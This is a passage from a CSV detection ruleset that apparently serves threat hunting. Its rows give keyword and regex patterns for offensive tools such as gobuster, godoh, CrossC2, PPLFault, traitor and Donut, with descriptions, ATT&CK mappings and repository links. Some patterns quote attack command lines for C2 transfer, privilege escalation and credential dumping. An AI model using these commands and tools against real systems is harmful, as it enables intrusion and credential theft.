- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*GmailC2.csproj*",".{0,1000}GmailC2\.csproj.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*gmsa_dump*",".{0,1000}gmsa_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMSAPasswordReader-master*",".{0,1000}GMSAPasswordReader\-master.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMShellcode*",".{0,1000}GMShellcode.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GMShellcode.*",".{0,1000}GMShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GMShellcode\*",".{0,1000}GMShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*go build Ivy.go*",".{0,1000}go\sbuild\sIvy\.go.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*go get -u *traitor/cmd/traitor*",".{0,1000}go\sget\s\-u\s.{0,1000}traitor\/cmd\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*go run cmd/chaos/main.go*",".{0,1000}go\srun\scmd\/chaos\/main\.go.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*go run poc.go check -t http://*:8080 -u Admin*",".{0,1000}go\srun\spoc\.go\scheck\s\-t\shttp\:\/\/.{0,1000}\:8080\s\-u\sAdmin.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*go run scannerPort.go*",".{0,1000}go\srun\sscannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*go thru each line in passwords.lst*",".{0,1000}go\sthru\seach\sline\sin\spasswords\.lst.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*Go, go ADeleginator!*",".{0,1000}Go,\sgo\sADeleginator!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*go_shellcode_encode.py*",".{0,1000}go_shellcode_encode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*gobfuscate*",".{0,1000}gobfuscate.{0,1000}","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1410","160","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" "*gobuster dir *",".{0,1000}gobuster\sdir\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster dir -w *",".{0,1000}gobuster\sdir\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gobuster dns*",".{0,1000}gobuster\sdns.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster fuzz -*",".{0,1000}gobuster\sfuzz\s\-.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster gcs *",".{0,1000}gobuster\sgcs\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster s3 *",".{0,1000}gobuster\ss3\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster tftp *",".{0,1000}gobuster\stftp\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster vhost -u *",".{0,1000}gobuster\svhost\s\-u\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster vhost*",".{0,1000}gobuster\svhost.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster*",".{0,1000}gobuster.{0,1000}","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster_*.tar.gz*",".{0,1000}gobuster_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobuster_*.zip*",".{0,1000}gobuster_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobusterfuzz*",".{0,1000}gobusterfuzz.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gobustertftp*",".{0,1000}gobustertftp.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*gocrack@password.crackers.local*",".{0,1000}gocrack\@password\.crackers\.local.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_darwin_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*",".{0,1000}gocrack_v.{0,1000}_linux_x64_hashcat_v3_6_0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*GodFault.exe*",".{0,1000}GodFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GodFault\GodFault*",".{0,1000}GodFault\\GodFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*godoh -*",".{0,1000}godoh\s\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh agent*",".{0,1000}godoh\sagent.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh c2*",".{0,1000}godoh\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh --domain*",".{0,1000}godoh\s\-\-domain.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh help*",".{0,1000}godoh\shelp.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh receive*",".{0,1000}godoh\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh send*",".{0,1000}godoh\ssend.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh test --*",".{0,1000}godoh\stest\s\-\-.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh test*",".{0,1000}godoh\stest.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --agent-name *--poll-time*",".{0,1000}godoh.{0,1000}\s\-\-agent\-name\s.{0,1000}\-\-poll\-time.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain * c2*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sc2.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain * receive*",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}\sreceive.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh* --domain *send --file *",".{0,1000}godoh.{0,1000}\s\-\-domain\s.{0,1000}send\s\-\-file\s.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-darwin64*",".{0,1000}godoh\-darwin64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-linux64*",".{0,1000}godoh\-linux64.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows32.*",".{0,1000}godoh\-windows32\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows32.exe*",".{0,1000}godoh\-windows32\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows64.*",".{0,1000}godoh\-windows64\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*godoh-windows64.exe*",".{0,1000}godoh\-windows64\.exe.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*go-donut/*.exe*",".{0,1000}go\-donut\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" 